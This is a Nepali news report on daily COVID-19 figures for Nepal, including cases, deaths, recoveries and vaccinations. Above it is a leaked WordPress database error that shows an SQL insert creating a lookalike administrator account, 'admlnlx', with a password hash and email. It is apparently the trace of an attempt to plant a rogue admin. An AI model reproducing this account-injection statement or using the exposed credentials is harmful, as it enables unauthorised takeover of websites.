WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5b9rHNtPx078adKNeqxKpMgiFkfMb/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-12 11:39:28', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । देशभर पछिल्लो २४ घण्टामा थप ७४७ जनामा कोरोना भाइरस सङ्क्रमण पुष्टि भएको छ । स्वास्थ्य तथा जनसङ्ख्या मन्त्रालयका अनुसार पछिल्लो समय आठ हजार ६९६ को परीक्षण गर्दा उक्त सङ्ख्यामा सङ्क्रमण पुष्टि भएको हो । योसँगै नेपालमा पीसीआर विधिबाट गरिएको परीक्षणमा कोरोना भाइरस सङ्क्रमितको सङ्ख्या नौ लाख ७३ हजार ५४१ पुगेको छ । एन्टिजेन परीक्षण गर्नेको सङ्ख्या एक लाख ३७ हजार ६७७ रहेको छ । पछिल्लो समय थप दुई हजार ३१९ सङ्क्रमणमुक्त भएका छन् ।
योसँगै सङ्क्रमणमुक्त हुनेको सङ्ख्या नौ लाख ४० हजार ९०२ पुगेको छ । यो दर ९६ दशमलव ६ प्रतिशत रहेको मन्त्रालयले जनाएको छ ।
आठको मृत्यु
हालसम्म कोरोना सङ्क्रमणबाट मृत्यु हुनेको सङ्ख्या ११ हजार ९०० पुगेको छ भने पछिल्लो २४ घण्टामा थप आठ जनाले ज्यान गुमाएको मन्त्रालयले जनाएको छ । पछिल्लो समय दुई लाख १६ हजार ११८ ले खोप लगाएको मन्त्रालयले जनाएको छ । हालसम्म सक्रिय सङ्क्रमितको सङ्ख्या २० हजार ७३९ रहेको छ । अहिले होम आइसोलेशनमा १९ हजार ९३० रहेका छन् । त्यसैगरी संस्थागत आइसोलेशनमा ८०९, आइसीयुमा १७८ र भेन्टिलेटरमा ३४ जनाले उपचार गराइरहेका छन् । रासस